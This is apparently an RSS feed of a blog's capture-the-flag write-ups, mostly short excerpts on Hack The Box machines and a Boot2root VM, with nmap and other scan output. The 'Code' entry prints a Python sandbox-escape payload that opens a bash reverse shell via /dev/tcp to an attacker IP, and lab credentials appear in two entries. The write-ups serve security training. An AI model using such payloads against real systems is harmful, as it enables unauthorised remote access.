<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
  <channel>
    <title>Yachay</title>
    <link>https://www.r4mnesia.xyz/write-up/</link>
    <description>Recent content on Yachay</description>
    <generator>Hugo -- gohugo.io</generator>
    <language>en-us</language>
    <lastBuildDate>Thu, 11 Sep 2025 18:18:17 +0200</lastBuildDate><atom:link href="https://www.r4mnesia.xyz/write-up/index.xml" rel="self" type="application/rss+xml" />
    <item>
      <title>Fluffy</title>
      <link>https://www.r4mnesia.xyz/write-up/fluffy/</link>
      <pubDate>Thu, 11 Sep 2025 21:17:54 +0200</pubDate>
      
      <guid>https://www.r4mnesia.xyz/write-up/fluffy/</guid>
      
      <description>&lt;p&gt;Fluffy on Hack The Box is an easy-level box focused on exploiting SMB and Active Directory vulnerabilities. With limited access via an SMB share, you quickly discover a security audit report exposing several critical CVEs.&lt;/p&gt;
&lt;h2 id=&#34;fluffy-easy-challenge-htb&#34;&gt;Fluffy Easy Challenge HTB&lt;/h2&gt;
&lt;p&gt;&lt;img src=&#34;https://www.r4mnesia.xyz/fluffy_htb/challenge.png&#34; alt=&#34;Screen&#34;&gt;&lt;/p&gt;
&lt;p&gt;Credentials : &lt;code&gt;j.fleischman / J0elTHEM4n1990!&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;We will test with &lt;strong&gt;smbclient&lt;/strong&gt; to see the shared files.&lt;/p&gt;
&lt;p&gt;&lt;img src=&#34;https://www.r4mnesia.xyz/fluffy_htb/smb1.png&#34; alt=&#34;Screen&#34;&gt;&lt;/p&gt;
&lt;p&gt;There are indeed files.&lt;br&gt;
The PDF may be of interest to us, so let&amp;rsquo;s see what it contains.&lt;/p&gt;</description>
      
    </item>
    
    <item>
      <title>Expressway</title>
      <link>https://www.r4mnesia.xyz/write-up/expressway/</link>
      <pubDate>Sat, 27 Sep 2025 14:08:01 +0200</pubDate>
      
      <guid>https://www.r4mnesia.xyz/write-up/expressway/</guid>
      
      <description>&lt;h1 id=&#34;expressway&#34;&gt;Expressway&lt;/h1&gt;
&lt;p&gt;&lt;img src=&#34;https://www.r4mnesia.xyz/expressway/expressway.png&#34; alt=&#34;screen&#34;&gt;&lt;/p&gt;
&lt;p&gt;Just one port open (SSH) with TCP scan.
&lt;img src=&#34;https://www.r4mnesia.xyz/expressway/nmap.png&#34; alt=&#34;screen&#34;&gt;&lt;/p&gt;
&lt;p&gt;Testing with UDP scan and find port 500 open, it&amp;rsquo;s isakmp (Internet Security Association and Key Management Protocol) port for VPN.
&lt;img src=&#34;https://www.r4mnesia.xyz/expressway/nmapUDP.png&#34; alt=&#34;screen&#34;&gt;&lt;/p&gt;
&lt;p&gt;ISAKMP is a protocol for establishing security association and cryptographic keys in an Internet environment.&lt;/p&gt;
&lt;p&gt;&lt;a href=&#34;https://en.wikipedia.org/wiki/Internet_Security_Association_and_Key_Management_Protocol&#34;&gt;https://en.wikipedia.org/wiki/Internet_Security_Association_and_Key_Management_Protocol&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;I find blog on hacktricks for exploit ISAKMP.
&lt;a href=&#34;https://book.hacktricks.wiki/en/network-services-pentesting/ipsec-ike-vpn-pentesting.html&#34;&gt;https://book.hacktricks.wiki/en/network-services-pentesting/ipsec-ike-vpn-pentesting.html&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;code&gt;sudo ike-scan -M 10.129.7.80&lt;/code&gt;
&lt;img src=&#34;https://www.r4mnesia.xyz/expressway/ike-scan.png&#34; alt=&#34;screen&#34;&gt;&lt;/p&gt;
&lt;p&gt;&lt;code&gt;sudo python3 iker.py 10.129.7.80&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;&lt;code&gt;sudo ike-scan -M --showbackoff 10.129.7.80&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;&lt;code&gt;sudo ike-scan -P -M -A -n fakeID  10.129.7.80&lt;/code&gt;&lt;/p&gt;</description>
      
    </item>
    
    <item>
      <title>Code</title>
      <link>https://www.r4mnesia.xyz/write-up/code/</link>
      <pubDate>Mon, 15 Sep 2025 18:20:55 +0200</pubDate>
      
      <guid>https://www.r4mnesia.xyz/write-up/code/</guid>
      
      <description>&lt;h1 id=&#34;code&#34;&gt;Code&lt;/h1&gt;
&lt;p&gt;&lt;img src=&#34;https://www.r4mnesia.xyz/code/code.png&#34; alt=&#34;Screen&#34;&gt;&lt;/p&gt;
&lt;p&gt;Nmap scan
&lt;img src=&#34;https://www.r4mnesia.xyz/code/nmap.png&#34; alt=&#34;Screen&#34;&gt;&lt;/p&gt;
&lt;p&gt;&lt;img src=&#34;https://www.r4mnesia.xyz/code/index.png&#34; alt=&#34;Screen&#34;&gt;
&lt;img src=&#34;https://www.r4mnesia.xyz/code/import_error.png&#34; alt=&#34;Screen&#34;&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href=&#34;https://book.hacktricks.wiki/en/generic-methodologies-and-resources/python/bypass-python-sandboxes/index.html&#34;&gt;https://book.hacktricks.wiki/en/generic-methodologies-and-resources/python/bypass-python-sandboxes/index.html&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Import does not work.
Loop to search for a specific class when you want to obtain it dynamically.&lt;/p&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;&#34;&gt;&lt;code class=&#34;language-python&#34; data-lang=&#34;python&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#66d9ef&#34;&gt;for&lt;/span&gt; i, cls &lt;span style=&#34;color:#f92672&#34;&gt;in&lt;/span&gt; enumerate(() &lt;span style=&#34;color:#f92672&#34;&gt;.&lt;/span&gt;__class__&lt;span style=&#34;color:#f92672&#34;&gt;.&lt;/span&gt;__bases__[&lt;span style=&#34;color:#ae81ff&#34;&gt;0&lt;/span&gt;]&lt;span style=&#34;color:#f92672&#34;&gt;.&lt;/span&gt;__subclasses__()):
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;    print(i, cls&lt;span style=&#34;color:#f92672&#34;&gt;.&lt;/span&gt;__name__)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;img src=&#34;https://www.r4mnesia.xyz/code/listing_modules.png&#34; alt=&#34;Screen&#34;&gt;&lt;/p&gt;
&lt;p&gt;It retrieves the 318th class from the &lt;code&gt;object.__subclasses__()&lt;/code&gt; list.
It instantiates this class by passing it a shell command that opens a reverse shell to 10.10.14.22:4444 as an argument.&lt;/p&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;&#34;&gt;&lt;code class=&#34;language-python&#34; data-lang=&#34;python&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;()&lt;span style=&#34;color:#f92672&#34;&gt;.&lt;/span&gt;__class__&lt;span style=&#34;color:#f92672&#34;&gt;.&lt;/span&gt;__bases__[&lt;span style=&#34;color:#ae81ff&#34;&gt;0&lt;/span&gt;]&lt;span style=&#34;color:#f92672&#34;&gt;.&lt;/span&gt;__subclasses__()[&lt;span style=&#34;color:#ae81ff&#34;&gt;317&lt;/span&gt;](&lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#34;bash -c &amp;#39;bash -i &amp;gt;&amp;amp; /dev/tcp/10.10.14.22/4444 0&amp;gt;&amp;amp;1&amp;#39;&amp;#34;&lt;/span&gt;, shell&lt;span style=&#34;color:#f92672&#34;&gt;=&lt;/span&gt;&lt;span style=&#34;color:#66d9ef&#34;&gt;True&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;img src=&#34;https://www.r4mnesia.xyz/code/reverseshellburp.png&#34; alt=&#34;Screen&#34;&gt;
&lt;img src=&#34;https://www.r4mnesia.xyz/code/shell.png&#34; alt=&#34;Screen&#34;&gt;&lt;/p&gt;</description>
      
    </item>
    
    <item>
      <title>Boot2root</title>
      <link>https://www.r4mnesia.xyz/write-up/boot2root/</link>
      <pubDate>Fri, 12 Sep 2025 21:19:57 +0200</pubDate>
      
      <guid>https://www.r4mnesia.xyz/write-up/boot2root/</guid>
      
      <description>&lt;p&gt;Boot2Root est une machine virtuelle. Le but est d’obtenir un accès root en trouvant deux failles différentes. Le challenge combine plusieurs vecteurs d’attaque, notamment du reverse engineering, des failles web comme des injections SQL, ainsi que la possibilité d’exploiter un upload de fichier PHP pour obtenir une exécution de code à distance.&lt;/p&gt;
&lt;h1 id=&#34;boot2root&#34;&gt;Boot2root&lt;/h1&gt;
&lt;h3 id=&#34;scan-nmap&#34;&gt;Scan Nmap&lt;/h3&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-13 09:31 UTC
Nmap scan report for 192.168.56.101
Host is up (0.00028s latency).
Not shown: 994 closed tcp ports (reset)
PORT    STATE SERVICE    VERSION
21/tcp  open  ftp        vsftpd 2.0.8 or later
|_ftp-anon: got code 500 &amp;#34;OOPS: vsftpd: refusing to run with writable root inside chroot()&amp;#34;.
22/tcp  open  ssh        OpenSSH 5.9p1 Debian 5ubuntu1.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 07:bf:02:20:f0:8a:c8:48:1e:fc:41:ae:a4:46:fa:25 (DSA)
|   2048 26:dd:80:a3:df:c4:4b:53:1e:53:42:46:ef:6e:30:b2 (RSA)
|_  256 cf:c3:8c:31:d7:47:7c:84:e2:d2:16:31:b2:8e:63:a7 (ECDSA)
80/tcp  open  http       Apache httpd 2.2.22 ((Ubuntu))
|_http-title: Hack me if you can
|_http-server-header: Apache/2.2.22 (Ubuntu)
143/tcp open  imap       Dovecot imapd
|_imap-capabilities: more capabilities IDLE IMAP4rev1 STARTTLS LOGINDISABLEDA0001 have post-login listed OK SASL-IR LOGIN-REFERRALS LITERAL+ ID Pre-login ENABLE
|_ssl-date: 2025-02-13T09:32:31+00:00; -1s from scanner time.
443/tcp open  ssl/http   Apache httpd 2.2.22
|_ssl-date: 2025-02-13T09:32:31+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=BornToSec
| Not valid before: 2015-10-08T00:19:46
|_Not valid after:  2025-10-05T00:19:46
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: 404 Not Found
993/tcp open  ssl/imaps?
|_ssl-date: 2025-02-13T09:32:31+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2015-10-08T20:57:30
|_Not valid after:  2025-10-07T20:57:30
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.95%E=4%D=2/13%OT=21%CT=1%CU=38008%PV=Y%DS=2%DC=T%G=Y%TM=67ADBC3
OS:0%P=x86_64-unknown-linux-gnu)SEQ(SP=11%GCD=FA00%ISR=9C%TI=I%CI=I%TS=U)OP
OS:S(O1=MFFC8%O2=MFFC8%O3=MFFC8%O4=MFFC8%O5=MFFC8%O6=MFFC8)WIN(W1=FFFF%W2=F
OS:FFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FFFF)ECN(R=Y%DF=N%T=40%W=FFFF%O=MFFC8%CC=
OS:N%Q=)T1(R=Y%DF=N%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=N%T=
OS:FF%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=N%T=40%W=FFFF%S=Z%A=S+%F=AR%O=%R
OS:D=0%Q=)T6(R=Y%DF=N%T=FF%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=N)U1(R=Y%DF=N%T=
OS:FF%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=N) 
&lt;/code&gt;&lt;/pre&gt;&lt;h3 id=&#34;scan-dirbuster&#34;&gt;Scan Dirbuster&lt;/h3&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;Dir found: /cgi-bin/ - 403
Dir found: /forum/ - 200
Dir found: /icons/ - 403
Dir found: /phpmyadmin/ - 200
File found: /forum/index.php - 200
Dir found: /forum/themes/ - 200
Dir found: /forum/themes/default/ - 200
Dir found: /forum/themes/default/images/ - 200
Dir found: /forum/js/ - 200
File found: /forum/js/main.min.js - 200
File found: /phpmyadmin/url.php - 200
File found: /phpmyadmin/Documentation.html - 200
Dir found: /webmail/ - 302
&lt;/code&gt;&lt;/pre&gt;&lt;h3 id=&#34;forum&#34;&gt;Forum&lt;/h3&gt;
&lt;h4 id=&#34;index&#34;&gt;Index&lt;/h4&gt;
&lt;p&gt;&lt;img src=&#34;https://www.r4mnesia.xyz/boot2root/forumIndex.png&#34; alt=&#34;screenshot&#34;&gt;&lt;/p&gt;</description>
      
    </item>
    
    <item>
      <title>Pirate</title>
      <link>https://www.r4mnesia.xyz/write-up/pirate/</link>
      <pubDate>Thu, 28 May 2026 10:00:22 +0200</pubDate>
      
      <guid>https://www.r4mnesia.xyz/write-up/pirate/</guid>
      
      <description>&lt;h1 id=&#34;pirate&#34;&gt;Pirate&lt;/h1&gt;
&lt;h2 id=&#34;level--hard&#34;&gt;Level : Hard&lt;/h2&gt;
&lt;p&gt;As is common in real life pentests, you will start the Pirate box with credentials for the following account&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;User: pentest&lt;/li&gt;
&lt;li&gt;Password: p3nt3st2025!&amp;amp;&lt;/li&gt;
&lt;/ul&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;&#34;&gt;&lt;code class=&#34;language-bash&#34; data-lang=&#34;bash&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;nmap -sC -sV $IP_TARGET -Pn
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;Starting Nmap 7.95 &lt;span style=&#34;color:#f92672&#34;&gt;(&lt;/span&gt; https://nmap.org &lt;span style=&#34;color:#f92672&#34;&gt;)&lt;/span&gt; at 2026-02-28 23:27 CET
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;Nmap scan report &lt;span style=&#34;color:#66d9ef&#34;&gt;for&lt;/span&gt; 10.129.8.145
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;Host is up &lt;span style=&#34;color:#f92672&#34;&gt;(&lt;/span&gt;0.052s latency&lt;span style=&#34;color:#f92672&#34;&gt;)&lt;/span&gt;.
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;Not shown: &lt;span style=&#34;color:#ae81ff&#34;&gt;985&lt;/span&gt; filtered tcp ports &lt;span style=&#34;color:#f92672&#34;&gt;(&lt;/span&gt;no-response&lt;span style=&#34;color:#f92672&#34;&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;PORT     STATE SERVICE       VERSION
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;53/tcp   open  domain        Simple DNS Plus
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;80/tcp   open  http          Microsoft IIS httpd 10.0
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;|_http-title: IIS Windows Server
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;| http-methods:
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;|_  Potentially risky methods: TRACE
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;|_http-server-header: Microsoft-IIS/10.0
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;88/tcp   open  kerberos-sec  Microsoft Windows Kerberos &lt;span style=&#34;color:#f92672&#34;&gt;(&lt;/span&gt;server time: 2026-03-01 05:27:31Z&lt;span style=&#34;color:#f92672&#34;&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;135/tcp  open  msrpc         Microsoft Windows RPC
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;389/tcp  open  ldap          Microsoft Windows Active Directory LDAP &lt;span style=&#34;color:#f92672&#34;&gt;(&lt;/span&gt;Domain: pirate.htb0., Site: Default-First-Site-Name&lt;span style=&#34;color:#f92672&#34;&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;|_ssl-date: 2026-03-01T05:28:54+00:00; +7h00m00s from scanner time.
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;| ssl-cert: Subject: commonName&lt;span style=&#34;color:#f92672&#34;&gt;=&lt;/span&gt;DC01.pirate.htb
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:&amp;lt;unsupported&amp;gt;, DNS:DC01.pirate.htb
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;| Not valid before: 2025-06-09T14:05:15
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;|_Not valid after:  2026-06-09T14:05:15
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;443/tcp  open  https?
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;445/tcp  open  microsoft-ds?
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;464/tcp  open  kpasswd5?
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP &lt;span style=&#34;color:#f92672&#34;&gt;(&lt;/span&gt;Domain: pirate.htb0., Site: Default-First-Site-Name&lt;span style=&#34;color:#f92672&#34;&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;|_ssl-date: 2026-03-01T05:28:53+00:00; +7h00m00s from scanner time.
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;| ssl-cert: Subject: commonName&lt;span style=&#34;color:#f92672&#34;&gt;=&lt;/span&gt;DC01.pirate.htb
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:&amp;lt;unsupported&amp;gt;, DNS:DC01.pirate.htb
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;| Not valid before: 2025-06-09T14:05:15
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;|_Not valid after:  2026-06-09T14:05:15
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;2179/tcp open  vmrdp?
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;3268/tcp open  ldap          Microsoft Windows Active Directory LDAP &lt;span style=&#34;color:#f92672&#34;&gt;(&lt;/span&gt;Domain: pirate.htb0., Site: Default-First-Site-Name&lt;span style=&#34;color:#f92672&#34;&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;|_ssl-date: 2026-03-01T05:28:54+00:00; +7h00m00s from scanner time.
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;| ssl-cert: Subject: commonName&lt;span style=&#34;color:#f92672&#34;&gt;=&lt;/span&gt;DC01.pirate.htb
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:&amp;lt;unsupported&amp;gt;, DNS:DC01.pirate.htb
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;| Not valid before: 2025-06-09T14:05:15
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;|_Not valid after:  2026-06-09T14:05:15
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP &lt;span style=&#34;color:#f92672&#34;&gt;(&lt;/span&gt;Domain: pirate.htb0., Site: Default-First-Site-Name&lt;span style=&#34;color:#f92672&#34;&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;|_ssl-date: 2026-03-01T05:28:53+00:00; +7h00m00s from scanner time.
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;| ssl-cert: Subject: commonName&lt;span style=&#34;color:#f92672&#34;&gt;=&lt;/span&gt;DC01.pirate.htb
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:&amp;lt;unsupported&amp;gt;, DNS:DC01.pirate.htb
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;| Not valid before: 2025-06-09T14:05:15
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;|_Not valid after:  2026-06-09T14:05:15
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 &lt;span style=&#34;color:#f92672&#34;&gt;(&lt;/span&gt;SSDP/UPnP&lt;span style=&#34;color:#f92672&#34;&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;|_http-title: Not Found
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;|_http-server-header: Microsoft-HTTPAPI/2.0
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;Host script results:
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;| smb2-time:
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;|   date: 2026-03-01T05:28:14
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;|_  start_date: N/A
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;| smb2-security-mode:
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;|   3:1:1:
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;|_    Message signing enabled and required
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;|_clock-skew: mean: 6h59m59s, deviation: 0s, median: 6h59m59s
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;Nmap &lt;span style=&#34;color:#66d9ef&#34;&gt;done&lt;/span&gt;: &lt;span style=&#34;color:#ae81ff&#34;&gt;1&lt;/span&gt; IP address &lt;span style=&#34;color:#f92672&#34;&gt;(&lt;/span&gt;&lt;span style=&#34;color:#ae81ff&#34;&gt;1&lt;/span&gt; host up&lt;span style=&#34;color:#f92672&#34;&gt;)&lt;/span&gt; scanned in 108.90 seconds
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id=&#34;smb-enumeration&#34;&gt;SMB enumeration&lt;/h2&gt;
&lt;p&gt;The GPOs are stored in &lt;code&gt;SYSVOL&lt;/code&gt; and we have read access rights in smb, so this can give us important information. I use &lt;code&gt;RECURSE ON&lt;/code&gt; to download the files in recursive mode and &lt;code&gt;PROMPT OFF&lt;/code&gt; to avoid a request for each file.&lt;/p&gt;</description>
      
    </item>
    
    <item>
      <title>Artificial</title>
      <link>https://www.r4mnesia.xyz/write-up/artificial/</link>
      <pubDate>Wed, 08 Oct 2025 14:35:52 +0200</pubDate>
      
      <guid>https://www.r4mnesia.xyz/write-up/artificial/</guid>
      
      <description>&lt;h1 id=&#34;artificial&#34;&gt;Artificial&lt;/h1&gt;
&lt;p&gt;&lt;img src=&#34;https://www.r4mnesia.xyz/artificial/nmap.png&#34; alt=&#34;Screen&#34;&gt;&lt;/p&gt;
&lt;p&gt;&lt;img src=&#34;https://www.r4mnesia.xyz/artificial/upload.png&#34; alt=&#34;Screen&#34;&gt;
&lt;img src=&#34;https://www.r4mnesia.xyz/artificial/dockerfile.png&#34; alt=&#34;Screen&#34;&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href=&#34;https://mastersplinter.work/research/tensorflow-rce/&#34;&gt;https://mastersplinter.work/research/tensorflow-rce/&lt;/a&gt;
&lt;img src=&#34;https://www.r4mnesia.xyz/artificial/PoC.png&#34; alt=&#34;Screen&#34;&gt;
&lt;img src=&#34;https://www.r4mnesia.xyz/artificial/exploit.png&#34; alt=&#34;Screen&#34;&gt;&lt;/p&gt;
&lt;p&gt;&lt;img src=&#34;https://www.r4mnesia.xyz/artificial/shell.png&#34; alt=&#34;Screen&#34;&gt;
&lt;code&gt;python3 -c &#39;import pty; pty.spawn(&amp;quot;/bin/bash&amp;quot;)&#39;&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;&lt;img src=&#34;https://www.r4mnesia.xyz/artificial/appPYTHON.png&#34; alt=&#34;Screen&#34;&gt;
&lt;img src=&#34;https://www.r4mnesia.xyz/artificial/find.png&#34; alt=&#34;Screen&#34;&gt;&lt;/p&gt;
&lt;p&gt;&lt;img src=&#34;https://www.r4mnesia.xyz/artificial/db.png&#34; alt=&#34;Screen&#34;&gt;
&lt;img src=&#34;https://www.r4mnesia.xyz/artificial/crack.png&#34; alt=&#34;Screen&#34;&gt;&lt;/p&gt;
&lt;p&gt;&lt;img src=&#34;https://www.r4mnesia.xyz/artificial/userFLAG.png&#34; alt=&#34;Screen&#34;&gt;&lt;/p&gt;
&lt;p&gt;&lt;img src=&#34;https://www.r4mnesia.xyz/artificial/telnet.png&#34; alt=&#34;Screen&#34;&gt;&lt;/p&gt;
&lt;p&gt;&lt;code&gt;ssh -L 9898:localhost:9898 gael@10.129.70.219&lt;/code&gt;
&lt;img src=&#34;https://www.r4mnesia.xyz/artificial/backrest.png&#34; alt=&#34;Screen&#34;&gt;
&lt;img src=&#34;https://www.r4mnesia.xyz/artificial/githubbackrest.png&#34; alt=&#34;Screen&#34;&gt;&lt;/p&gt;
&lt;p&gt;&lt;img src=&#34;https://www.r4mnesia.xyz/artificial/backups.png&#34; alt=&#34;Screen&#34;&gt;
&lt;img src=&#34;https://www.r4mnesia.xyz/artificial/extract.png&#34; alt=&#34;Screen&#34;&gt;
&lt;img src=&#34;https://www.r4mnesia.xyz/artificial/rootpass.png&#34; alt=&#34;Screen&#34;&gt;
&lt;img src=&#34;https://www.r4mnesia.xyz/artificial/base64.png&#34; alt=&#34;Screen&#34;&gt;
&lt;img src=&#34;https://www.r4mnesia.xyz/artificial/bcrypt.png&#34; alt=&#34;Screen&#34;&gt;
&lt;img src=&#34;https://www.r4mnesia.xyz/artificial/hashcat.png&#34; alt=&#34;Screen&#34;&gt;&lt;/p&gt;
